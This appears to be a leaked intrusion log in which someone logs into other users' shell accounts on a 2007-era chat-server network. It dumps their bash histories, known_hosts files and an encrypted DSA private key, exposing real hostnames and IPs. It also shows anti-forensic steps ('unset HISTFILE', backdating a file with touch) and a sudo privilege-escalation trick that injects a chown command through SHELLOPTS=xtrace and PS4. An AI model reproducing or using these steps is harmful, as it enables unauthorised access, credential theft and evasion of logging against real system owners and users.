C6u1RMqueWyd0LLZD2QIVmJ1ijRtQDibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUo
m2qChYoVBFLimYvH+b3fclaQaSichE=
www.liber-mundi.org,81.93.5.180 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAt
Sbs8/VCyV0KAFHWmggnC3QHa2qh9AYdUYE4OrbUK7oA4Ozq8D5V2GYhBmpkMvYcCENNi7
cxyeTEMdEeBWok/zRcxRkGYAxM7Zg2NsbIez9+bB1ojKy5BoNLsocoQbvzgVbxOXHvRwc
WTGK9H7Yq8ZJPLC4ezsOpAcyTeBHEeuM=
zloche@vds349:~/.ssh$ cat known_hosts~
localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdH
MWWgnMmR9KkDXZuiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QI
VmJ1ijRtQDibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3f
claQaSichE=
74.69.17.126 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA5vHP/DNtJSXwf+2YNhLD
9MX2HkcuNqhGNtmJ6/sis9MTAQTEqnTi0Nw4yaoQL0qFM7nZkS8OGQI0X55c0Ud0JEXjb
XuikZEFUtzr2A+up19wewbpMsMRac87r+vtU218ozOUjYuurhJwF58DhrUKLrTwa5hl8p
RFTifSqhrhKCMBdQreHkmR8GoHIohMdkaPyIACKBgAaUDFX4VHoYW7AbJlO/3cJLxWEHo
UkRM9aHi6tfqXt69e8W1LGXCEI83xUyjOT+ndCm3x+w/Scuw7kBrjSYg0CXaxDTR5l8lB
MJAdenr9CFWPMKbeOLrvdAlpPewJ5EKRSxY4sWZqZwaqWQ==
www.zloche.com,81.93.5.180 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtSbs8/
VCyV0KAFHWmggnC3QHa2qh9AYdUYE4OrbUK7oA4Ozq8D5V2GYhBmpkMvYcCENNi7cxyeT
EMdEeBWok/zRcxRkGYAxM7Zg2NsbIez9+bB1ojKy5BoNLsocoQbvzgVbxOXHvRwcWTGK9
H7Yq8ZJPLC4ezsOpAcyTeBHEeuM=
server4,213.251.160.26 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+
BGB83ed97xlvJYWNm8FeE91nhXx05mZ4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdM
YCsDqa89dqNuSl0Mx7/qHPS3oQW/nPFC8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4Tlt
UMbrLRHYfAi3HbwGj6bIiuE=
server1.zloche.net,65.92.156.62 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAt
Wj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQ
mfdPB300tEh4rcqt7hCvqzodn7z9RFzmKBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3f
mJDENJ/7QKV3qCY3N1WB5HW/aTI+cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dE
AmNWZnAvsZTGTqqKzpobD83VBNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lj
a+wLTlplhGOEazVa+IrXwVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
irc.rasterized.net,76.108.85.21 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAy
aQ6kpWI3wBfCGF+/EGC8JLuPI4ahiREMNe0e/vUAfFjT044zOVoowDC0Ek1wgh0TAuv3D
zjz6XxknwMkaYo/KCM+CmTAQqYGj4AwxUrzy4ImUJNxvQVJxrHRL40B61lT+lSXpgsjBT
aV4qWE5vTIMoa9uz1159D5CpHMuAKU70=
server2,74.14.168.190 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzv
LAHmMtiPCbMzwa+jYBcJOEVlE/vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tE
h4rcqt7hCvqzodn7z9RFzmKBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QK
V3qCY3N1WB5HW/aTI+cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZ
TGTqqKzpobD83VBNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhG
OEazVa+IrXwVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
server4.zloche.net ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB8
3ed97xlvJYWNm8FeE91nhXx05mZ4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsD
qa89dqNuSl0Mx7/qHPS3oQW/nPFC8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbr
LRHYfAi3HbwGj6bIiuE=
70.55.196.23 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPC
bMzwa+jYBcJOEVlE/vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hC
vqzodn7z9RFzmKBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1W
B5HW/aTI+cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpo
bD83VBNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+Ir
XwVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
70.53.254.248 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiP
CbMzwa+jYBcJOEVlE/vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7h
Cvqzodn7z9RFzmKBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1
WB5HW/aTI+cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzp
obD83VBNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+I
rXwVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
70.53.253.12 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPC
bMzwa+jYBcJOEVlE/vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hC
vqzodn7z9RFzmKBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1W
B5HW/aTI+cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpo
bD83VBNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+Ir
XwVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
zokio.com,69.70.67.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApry7VslTBItK
BaxF942eAL6/mz/P9F7XBNUySJEg2uU6N3GfwH5QBo0s1DDS6YAvGTftSYS+9Ix3mr7wA
l6nMQCwcEwiz4j2I3g38dVynfNosgdIIpTwkmuM7ZHogpSoQBs5eEdDW9tK+oZeDQi5N/
g7QGZvFwCSmoEUq/StvqS0N9Wc1H9SSW8Ppe/CWNuFi/eRiX9SrmMHYpj7Yi6IC+FZOKn
9rCeIAlmC6xkVa/6c3Kg0Mc5CG/2j2IqbtQ1E6Jcnzp/Fp8KbuIoje0HgjxP193K7tLUN
gu7+3o0fuQnjJdXD9iIgwNAfamogurF79fkWAZfBNxDxSW5LD//L8w==
70.53.255.87 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPC
bMzwa+jYBcJOEVlE/vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hC
vqzodn7z9RFzmKBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1W
B5HW/aTI+cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpo
bD83VBNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+Ir
XwVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
zloche@vds349:~$ cat .bash_history
cd ~/zloche.net/var/www/html/chat/users
emacs zlocheadmin.look
emacs zlocheadmin.look
w
write gumbie
ssh stax@server2
w
w
ls
cd zloche.net/var/www/ch
cd zloche.net/var/www/html/chat/
ls
du -csh
df -h
w
ls
mkdir logs
cd logs/
w
ls
cd ..
rm serveur_php4.php
emacs serveur_php4.php
emacs serveur_php4.php
php serveur_php4.php
cd logs/
ls
less 05_06_07.log
cd ..
php serveur_php4.php
rm lol*
less logs/05_06_07.log
rm serveur_php4.php
emacs serveur_php4.php
php serveur_php4.php
rm serveur_php4.php
emacs serveur_php4.php
php serveur_php4.php
emacs serveur_php4.php
php serveur_php4.php
less logs/05_06_07.log
php serveur_php4.php
cd users
rm *.friends
cd ..
php serveur_php4.php
rm serveur_php4.php
emacs serveur_php4.php
emacs serveur_php4.php
php serveur_php4.php
emacs serveur_php4.php
php serveur_php4.php
emacs serveur_php4.php
emacs inc/banip.php
emacs versions/popup.html
top -b |grep php
kill 29927
ls
rm logs/05_06_07.log
nohup php serveur_php4.php &
emacs inc/banip.php
emacs inc/banip.php
cd zloche.net/var/www/html/chat/
less alwaysping.php
cd zloche.net/var/www/html/chat/logs/
ls
less 06_06_07.log
nmap 207.253.115.51
nmap -p0 207.253.115.51
nmap -P0 207.253.115.51
++++++++
ssh alex@www.zloche.com
emacs /vhost/home/zloche/.ssh/known_hosts
ssh alex@www.zloche.com
w
ssh alex@www.liber-mundi.org
cd zloche.net/var/mail/
ls
less stax
less zloche
less catch-all
cd ..
ls
cd www/html/
cd chat/
ls
cd logs/
less 06_06_07.log
ls
cd ..
ls
cd inc/
ls
w
w
w
w
w
w
w
ww
w
w
w
w
w
ww
w
w
ww
ls
less floodcheck.php
less banip.php
less buyitem.php
less filter.php
less pickitem.inc
emacs pickitem.inc
w
w
id
ls -alh
cat .login
cat .bash_history
eho $SHELL
echo $SHELL
ls
w
bash
cd zloche.net/var/www/html/chat/versions/
ls
emacs index.php
w
cd ../logs/
ls
less 06_06_07.log
w
df -h
w
w
emacs ../inc/banip.php
emacs ../inc/banip.php
ls
less 06_06_07.log
w
w
ls
cd ..
cd users
ls *.admin
ls *" "*
ls "* *"
ls *
ls *
rm -*
unlink -_\ juvénile_-.*
unlink "-_\ juvénile_-.*"
ls
ls *.usr
rm -_\ juvénile_-.*
rm -f "-_\ juvénile_-.*"
unlink -_\ juvénile_-.*
unlink "-_\ juvénile_-.*"
unlink "-_ juvénile_-.usr""
unlink "-_ juvénile_-.usr"
unlink "-_\ juvénile_-.usr"
unlink "-_\ juvénile_-.act"
ls
ls -\ *
unlink "-_ juvénile_-.mail"
unlink "-_ juvénile_-.*"
unlink "-_ juvénile_-.act""
unlink "-_ juvénile_-.act"
unlink "-_ juvénile_-.usr"
unlink "- juvenile -."*
unlink "- juvenile -.usr""
unlink "- juvenile -.usr"
unlink "- juvenile -.act"
unlink "- juvenile -.mail"
du -csh
ls *.usr |grep -n ".usr"
cd ver
unlink "..::rewind::...usr"
cd ../versions/
ks
ls
emacs infos.txt
emacs infos.txt
cd decor/
ls
ls
cd ..
emacs reggggg.php
rm reggggg.php
emacs reggggg.php
rm reggggg.php
emacs reggggg.php
rm reggggg.php
emacs reggggg.php
rm reggggg.php
emacs reggggg.php
rm reggggg.php
emacs reggggg.php
emacs testtt.php
emacs reggggg.php
rm register.php
mv reggggg.php register.php
ls
cd ..
ls
rm serveur_php4.php
emacs serveur_php4.php
php serveur_php4.php
emacs inc/banip.php
emacs inc/banip.php
php serveur_php4.php
emacs inc/banip.php
php serveur_php4.php
emacs users/blackxthink
emacs users/blackxthink.look
php serveur_php4.php
emacs serveur_php4.php
cd versions/
emacs popup.html
top -b |grep php
kill 9662
cd ..
ls
nohup php serveur_php4.php &
emacs inc/banip.php
emacs inc/filter.php
emacs inc/floodcheck.php
emacs versions/setdescription.php
chmod 777 users/whynot.desc
ssh root@localhost
w
w
w
ls
cd zlo*/var/www/html/chat
cd users
emacs zokio.look
emacs zokio.look
clear
emacs whynot5.usr
emacs whynot5.usr
unlink whynot5.usr
emacs whynot5.usr
emacs whynot5.usr
emacs whynot.usr
mv whynot5.admin whynot.admin
find *.admin
emacs blackxthink.look
emacs blackxthink.look
emacs blackxthink.look
emacs zloche.look
clear
w
write zloche
write zloche pts/9
write zloche 19
write pts/19
write zloche pts/9
cd ..
ls
cd users
ls
find *.admin
emacs whynot.desc
emacs whynot.desc
emacs whynot.desc
find *.admin
emacs zokio.look
emacs zokio.look
emacs zokio.look
emacs aquafine.look
emacs aquafine.look
clear
cd zlo*
cd var
cd ww
cd www
cd html
cd chat
clear
ls
clear
cd users
find *.admin
unlink whitehack.admin
find *.admin
cd ..
ls
cd logs
ls
less 06_06_07.out | grep "Kicked"
less 06_06_07.log | grep "Kicked"
less 06_06_07.log | grep "Kicked"
less 06_06_07.log | grep "Kicked"
less 06_06_07.log | grep "Kick"
less 06_06_07.log | grep "kick"
less 06_06_07.log | grep "ked"
less 06_06_07.log | grep "Kicked"
clear
less 06_06_07.log | grep "Kicked"
clear
less 06_06_07.log | grep "Kicked"
cd ..
cd users
cat j0k3rs.look
cat j0k3r.look
cd ..
cd logs
clear
less 06_06_07.log | grep "Kicked"
clear
cd ..
cd users
emacs Zokio.look
emacs zokio.look
emacs dezimtox.look
emacs dezimtox.admin
find *.admin
unlink fireflame.admin
clear
cd ..
cdlogs
cd logs
less 06_06_07.log | grep "Kicked"
less 06_06_07.log | grep "Kicked"
cd ..
cd users
emacs xsggx.look
emacs xsggx.look
cat misschixxa140.look
emacs xsggx.look
cd ..
cd logs
clear
less 06_06_07.log | grep "Kicked"
cd ..
cd users
find *.admin
w
write zloche
find *.admin
cat dezimtox.look
find *.admin
find *.admin
cd ..
cd logs
less 06_06_07.log | grep "Kicked"
ls
cd ..
cd users
find *.admin
lear
clear
cd ..
cd logs
less 06_06_07.log | grep "Kicked"
clear
less 06_06_07.log | grep "Kicked"
clear
clear
less 06_06_07.log | grep "Kicked"
clear
less 06_06_07.log | grep "Kicked"
less 06_06_07.log | grep "Kicked"
clear
less 06_06_07.log | grep "Kicked"
less 06_06_07.log | grep "Kicked"
clear
less 06_06_07.log | grep "Kicked"
less 06_06_07.log | grep "Kicked"
cat mlleboulanger.look
cd ..
cd users
cat mlleboulanger.look
clear
cd ..
cd logs
less 06_06_07.log | grep "Kicked"
clear
less 06_06_07.log | grep "Kicked"
clear
less 06_06_07.log | grep "Kicked"
cd zlo*/var/www/html/chat/users
emacs zlocheadmin.look
exit
cd zloche.net/var/www/html/chat/
ls
cd logs/
ls
less 07_06_07.log 0
ls
cd ../users
du -csh
ls *.pos
ls *.act
ls *.usr |grep -n ".usr"
w
w
w
w
write djdd
cd ~
cd zloche.net/var/www/html/chat/
rm serveur_php4.php
emacs serveur_php4.php
top -b |grep php
kill 20431
nohup php serveur_php4.php
nohup php serveur_php4.php &
rm serveur_php4.php
emacs serveur_php4.php
top -b |grep php
kill 7801
nohup php serveur_php4.php &
rm serveur_php4.php
emacs serveur_php4.php
top -b |grep php
kill 7844
nohup php serveur_php4.php &
cd users
ls
du -csh
rm \[server\].usr | cp stax.usr \[server\].usr
cat stax.look
emacs \[server\].look
netstat
netstat -n
nmap -p0-65536 localhost
nmap -p0-65535 localhost
emacs ../inc/filter.php
emacs rael.look
emacs ../teleports/lipo.tele
emacs ../teleports/lipo.tele
cd ..
emacs room15.objects
emacs room62.objects
emacs room62.objects
emacs room71.objects
ping server3
ping www.zloche.net
emacs room71.objects
cd bans/
ls
cd ..
cd logs/
du -csh
cd ../
ls bans/
du -csh
less fin
less find
ls
cd bans/
du -csh
less find
cd ..
cd users
ls *.ip
ls *.mail
ls *.usr
ls *.usr |grep -n ".usr"
ls *é*
ls *é*
cd ..
cd versions/
ls
less crossdomain.xml
emacs index.php
rm ../users/xwhynotxbotx.*
rm ../users/xwhynotxbotx.act
emacs index.php
cd zloche.net/var/www/html/chat/
ls
ls
cd versions/
rm infos.txt~
mv infos_.txt infox_.php
emacs popup.html
mv infox_.php infos_.php
emacs popup.html
w
cd zloche.net/var/www/html/chat/
top -b |grep php
kill 7899
nohup php serveur_php4.php &
less nohup.out
top -b |grep php
kill 10771
rm nohup.out
nohup php serveur_php4.php &
less nohup.out
nmap -p0-65535 localhost
w
cd zloche.net/var/www/html/chat/users
emacs xposed.inv
zloche@vds349:~$ cd mail
zloche@vds349:~/mail$ ls -alh
total 16K
drwx------ 3 zloche vuser 4.0K Mar 8 03:20 .
drwxr-x--- 8 zloche vhost 4.0K May 6 13:00 ..
drwx------ 6 zloche vuser 4.0K Mar 8 03:05 .imap
-rw------- 1 zloche vuser 36 Mar 8 03:04 .subscriptions
-rw------- 1 zloche vuser 0 Mar 8 03:04 INBOX.Drafts
-rw------- 1 zloche vuser 0 Mar 8 03:04 INBOX.Sent
-rw------- 1 zloche vuser 0 Mar 8 03:04 INBOX.Trash
zloche@vds349:~/mail$ cd ..
zloche@vds349:~$ cd public_html/
zloche@vds349:~/public_html$ ls -alh
total 12K
drwxr-xr-x 2 zloche vuser 4.0K Mar 8 00:57 .
drwxr-x--- 8 zloche vhost 4.0K May 6 13:00 ..
-rw-r--r-- 1 root vhost 80 Mar 8 00:57 index.html
zloche@vds349:~/public_html$ cat index.html
<b>Home of <a
href="/admin/vhost.php?username=zloche">zloche@zloche.net</a></b>
zloche@vds349:~/public_html$ su -l djdd
bash: /bin/su: Permission denied
zloche@vds349:~/public_html$ su -l djdd
bash: /bin/su: Permission denied
zloche@vds349:~/public_html$ man login
Reformatting login(1), please wait...
zloche@vds349:~/public_html$ login djdd
No utmp entry. You must exec "login" from the lowest level "sh"
zloche@vds349:~/public_html$ exit
vds349.sivit.org> login djdd
No utmp entry. You must exec "login" from the lowest level "sh"
vds349.sivit.org>
vds349.sivit.org> logout
Connection to 80.248.208.223 closed.
[deadlyacid@localhost ~]$ ssh djdd@80.248.208.223
Password:
Linux vds349.sivit.org 2.6.12.6-xenU #1 SMP Fri Feb 24 01:08:35 CET 2006 i686
GNU/Linux
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jun 7 10:19:12 2007 from server4.zloche.net
djdd@vds349:~$ ls -alh
total 52K
drwxrwxrwx 6 djdd vhost 4.0K Jun 6 17:04 .
drwx--x--x 22 root staff 4.0K Jun 3 16:33 ..
-rw------- 1 djdd djdd 3.5K Jun 7 15:07 .bash_history
-rw-r--r-- 1 djdd djdd 567 Oct 27 2006 .bash_profile
-rw-r--r-- 1 djdd djdd 1.8K Oct 27 2006 .bashrc
-rwxr-xr-x 1 djdd djdd 12K Jun 6 16:55 .cshrc
drwx------ 2 djdd djdd 4.0K Mar 28 14:19 .irssi
drwx------ 2 djdd djdd 4.0K Nov 9 2006 .ssh
drwxr-xr-x 5 djdd djdd 4.0K Oct 27 2006 .usermin
-rwxr-xr-x 1 djdd djdd 40 Jun 6 17:04 .x.sh
drwxrwxrwx 3 djdd djdd 4.0K Nov 4 2006 public_html
djdd@vds349:~$ cat .bash_history
ls
mkdir public_html
mv * public_html/
ls -l
ls -la
chmod og-w .
mkdir public_html
fg
exit
lynx www.gmail.com
hmmmm
www.liveitsolution.com
whois liveitsolution.com |less
dig liveitsolution.com soa
no soa
dig liveitsolution.com NS
dig liveitsolution.com
dig liveitsolutions.com NS
dig www.liveitsolution.com
whois liveitsolution.com |less
dig @216.40.47.15 liveitsolutions.com NS
dig @216.40.47.16 liveitsolutions.com NS
dig @216.40.47.16 liveitsolutions.com soa
dig @216.40.47.15 liveitsolutions.com soa
dns1.registerfly.com
dig @216.40.47.15 liveits.com soa
whois liveits.com |less
dig @216.40.47.15 liveits.com soa
dig @216.40.47.15 liveits.com
dig @216.40.47.15 liveits.com ns
dig liveits.com
whois liveits.com |less
whois liveits.com | grep "Name Server"
whois liveits.com |less
whois liveits.com | grep "Name Server"
well, we have plenty of time to set this up....im in no hurry
passwd
kibitz -tty pts/5 gumbie
kibitz -tty pts/5 gumbie
mesg y
kibitz -tty pts/5 gumbie
'mesg y'
kibitz -tty pts/5 gumbie
kibitz -24213
exit
id
ssh-add
ssh-add
ssh-add
scp -P 443 .ssh/id_dsa DJDD@rasterized.net./.ssh/id_dsa
scp -P 443 .ssh/id_dsa DJDD@rasterized.net:/.ssh/id_dsa
scp -P 443 .ssh/id_dsa DJDD@rasterized.net:.ssh/id_dsa
ssh DJDD@rasterized.net -p 443 -v
ssh-keygen
ssh-keygen -t dsa
ssh-keygen -t dsa
ls .ssh
cat .ssh/id_dsa.pub
ssh djdd@rasterized.net -P443 -v
ssh djdd@rasterized.net -P 443 -v
ssh djdd@rasterized.net -p 443 -v
ssh DJDD@rasterized.net -p 443 -v
ssh DJDD@rasterized.net -p 443 -v
ssh DJDD@rasterized.net -p 443 -v
ssh-agent bash
passwd
kibitz -tty pts/5 gumbie
kibitz pts/5 gumbie
kibitz -tty gumbie
ls -l `which kibitz`
kibitz -tty pts/5 gumbie
mesg
mesg y
kibitz -tty pts/5 gumbie
kibitz -29378
hmm
kibitz -39398
kibitz -tty pts/5 gumbie
i did
kibitz-29459
kibitz -29459
exit
cd ~
ls
cd public_html
ls
cd ..
ls -al
cd ..
ls -al
ls djdd -al
ls -al
ls
passwd
ssh craplandia.org
screen irssi
screen -raAd
screen -raAd
exit
exit
w
uname -a
find ../
ls -alR ../
cat /etc/passwd
cat /etc/passwd | grep "bash"
cd /home/cyrus
ls -alh
cd /home/raster
ls -alh
cd /home/stax
ls -alh
cd "%backup%~"
file \%backup\%\~
less \%backup\%\~
clear
ls -alh
screen -raAd
screen irssi
top
exit
screen -raAd
exit
w
ls -alh
id
ls
ls -l ../
cd ~irc
cd ~ircd
uname -a
screen -raAd
screen irssi
ls
screen -RR
screen -raAd
w
write stax 7 was that you?
write stax pts/7 was that you?
write stax was that you?
who
write stax tty7 was that you?
mesg y
write user stax was that you?
w'ddddddgklasdfjakfgkl'jakldf
wall
man write
screen -raAd
screen irssi
exit
screen -raAd
screen irssi
screen -raAd
exit
w
uname -a
w
sudo --version
man sudo
q
sudo -V
ls -alh
cat .bash_history
unenv | grep -i "hist"
env | grep -i "hist"
env | grep -i "user"
cat > .cshrc
cd ~
pwd
setenv SHELLOPTS xtrace
SHELLOPTS=xtrace
export SHELLOPTS=xtrace
exit
ls
csh
chsh
tcsh
tgcsh
ls -l /bin | grep "sh"
w
cat /etc/shells
/bin/csh
sh
vim .bashrc
vi .bashrc
vi .bash_profile
grep "SHELLOPTS" .bashrc
vi .bahrc
vi .bashrc
ls -alh .bashrc
vi .bashrc
touch -t 200610271634 .bashrc
ls -alh .bashrc
w
man xtrace
xtrace
vi .x.sh
env | grep "PS4"
echo $PS4
export PS4=`$(chown root.root .cshrc)`
export PS4='$(chown root.root .cshrc)'
echo $PS4
chmo +x .x.sh
chmod +x .x.sh
sudo ./.x.sh
ls -alh
ls -lisa .cshrc
sudo id
ls
w
su -l stax
ls -alh su
ls -alh /bin/susu
ls -alh /bin/su
sudo sustax -l
screen -raAd
exit
host server4
host server3
host server2
host server1
host server6
host server7
host server8
screen -raAd
djdd@vds349:~$ cd .ssh
djdd@vds349:~/.ssh$ ls -alh
total 20K
drwx------ 2 djdd djdd 4.0K Nov 9 2006 .
drwxrwxrwx 6 djdd vhost 4.0K Jun 6 17:04 ..
-rw------- 1 djdd djdd 736 Nov 9 2006 id_dsa
-rw-r--r-- 1 djdd djdd 611 Nov 9 2006 id_dsa.pub
-rw-r--r-- 1 djdd djdd 680 Apr 18 15:30 known_hosts
djdd@vds349:~/.ssh$ cat id_dsa
-----BEGIN DSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,5A84045F7AE97BF5
OLpiQ4jAqNOvsx5EVaY5NtqAXYEhvy3z6AuL3dskW6WlgP4jCTykd2dTfcuY+7YV
HqhVI/izngdTgBVoz5xdsLwxPmXKYv7H6GBISHRzpAyq04XtI63a3lA2CIf+PKBV
m09LxyFAJ88t5j3X1V9E99pFCmVBkfjRDvIaKUbRhjWsATKh3Imm71OPqdZumA0q
3CGh0qEZW72I0l0xzBIUeEajfS3CSfxs2XOBeXLlG+eh1SmMdaS96R00pWiy4VCy
p/WBpQ9kDexlEfKPGNPpd4Stc9cZVNWb+2HXMXj6xriekcvSb30i/UrtJgVb9S+R
Xrhx4AC2XjCmw82KHvCqgrWN746deHdC22huP2n1Ig4mldhMrK6UqWNzavwJ/btv
nEMNn3r1hoQ8rhHn9PePeXOOxvc6D99vKhkI16RH0Ol+IXvyKPoqPJgaz8WGbvmC
rq3Brdt6iIa9/wPXLwB6bo7zPQ/uB3akg+s+e2laqWGuItvgcfurfJp9108WoFM0
y600xzfQxpOPqGzIjWa359O/v1opX1zviHjuI5NHUDOkKBoIXT8VZdAZr3SbGAMh
6td52Ps+2x3pdyYEiQx8NA==
-----END DSA PRIVATE KEY-----
djdd@vds349:~/.ssh$ cat id_dsa.pub
ssh-dss
AAAAB3NzaC1kc3MAAACBAI6Lc8yLa2rY9x0usKkIuF+KOrnNY9rXPb4QepTiCnT0
XeeO3xvp/U2UGKFNRwvVIVRvBnlQYxLjNyPLq5b7GyOWF1wheREiyDwwPn/Ei67i
3flFSEEigwStaYZyqUblyhGb8V+/zuM6IU0+fUyJ3njg2dYCzuS6EmxG6CEXwYmJ
AAAAFQCuVVp4oCYDMEhVcrba8Rp8MlDE8QAAAIA+pKsVtYmlcxOUhuMLGgiLyM2e
/eV7xaeLqFD3fxSog7XjtuTxJlb7TzJ8X0/q0mLtfk4n/+kRX7UJCfLmzOgcR9vu
ROUWwt4VU5Aw4iFf8OuPgT2y5SlnGKlSNupStubGNIVO+PNKR6aW82KzpRQXEkCY
DfFBJGlG5JQr2KLpKgAAAIBk3u6xP29pU92Qwg+5DJuE6L4kHHW2f1NPjoCFb1wO
cf2yi2V4eT8prKP+IFjqOfuCaTB+0fK/kWtX/vTA/lei3x19JKLHwY0+nMmnvvep
VBch5IrPyZQs4zyPFRxc7cWAgXdPETdrCZ/q5h4CI2qBvXQ2gfckFcaOZWwET13l
Nw==
djdd@vds349.sivit.org
djdd@vds349:~/.ssh$ cat known_hosts
rasterized.net,69.163.232.231 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAyaQ6kpWI3wBfCGF+/EGC8JLuPI4ahiREMNe0
e/vUAfFjT044zOVoowDC0Ek1wgh0TAuv3Dzjz6XxknwMkaYo/KCM+CmTAQqYGj4A
wxUrzy4ImUJNxvQVJxrHRL40B61lT+lSXpgsjBTaV4qWE5vTIMoa9uz1159D5CpH
MuAKU70=
76.108.85.21 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAyaQ6kpWI3wBfCGF+/EGC8JLuPI4ahiREMNe0
e/vUAfFjT044zOVoowDC0Ek1wgh0TAuv3Dzjz6XxknwMkaYo/KCM+CmTAQqYGj4A
wxUrzy4ImUJNxvQVJxrHRL40B61lT+lSXpgsjBTaV4qWE5vTIMoa9uz1159D5CpH
MuAKU70=
127.0.0.1 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDX
ZuiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRt
QDibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fcla
QaSichE=
djdd@vds349:~/.ssh$ logout
Connection to 80.248.208.223 closed.
[deadlyacid@localhost ~]$ ssh djdd@213.251.160.26
The authenticity of host '213.251.160.26 (213.251.160.26)' can't be established.
RSA key fingerprint is fe:ea:94:0b:a9:04:aa:e4:d3:d6:dd:f8:cd:a9:8c:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '213.251.160.26' (RSA) to the list of known hosts.
Password:
Linux ks32211.kimsufi.com 2.4.33grs-bipiv-ipv4-32 #1 SMP lun oct 23 19:00:07 CEST 2006 i686 GNU/Linux
machine : 8410
ip : 213.251.160.26
hostname : ks32211.kimsufi.com
Welcome on Server4, the 4th server of the zloche network =]
Last login: Fri Jun 8 17:50:48 2007 from 216.186.154.117
djdd@server4:~$ unset HISTFILE ; unset SAVEHIST
djdd@server4:~$ uname -a
Linux server4.zloche.net 2.4.33grs-bipiv-ipv4-32 #1 SMP lun oct 23 19:00:07 CEST 2006 i686 GNU/Linux
djdd@server4:~$ cat /etc/issue
Debian GNU/Linux 3.1 \n \l
djdd@server4:~$ ls -alh
total 32K
drwxr-xr-x 3 djdd djdd 4.0K 2007-02-01 04:28 .
d-wx--s--x 17 root root 4.0K 2007-05-06 03:51 ..
-rw-r--r-- 1 djdd djdd 266 2007-02-01 04:24 .alias
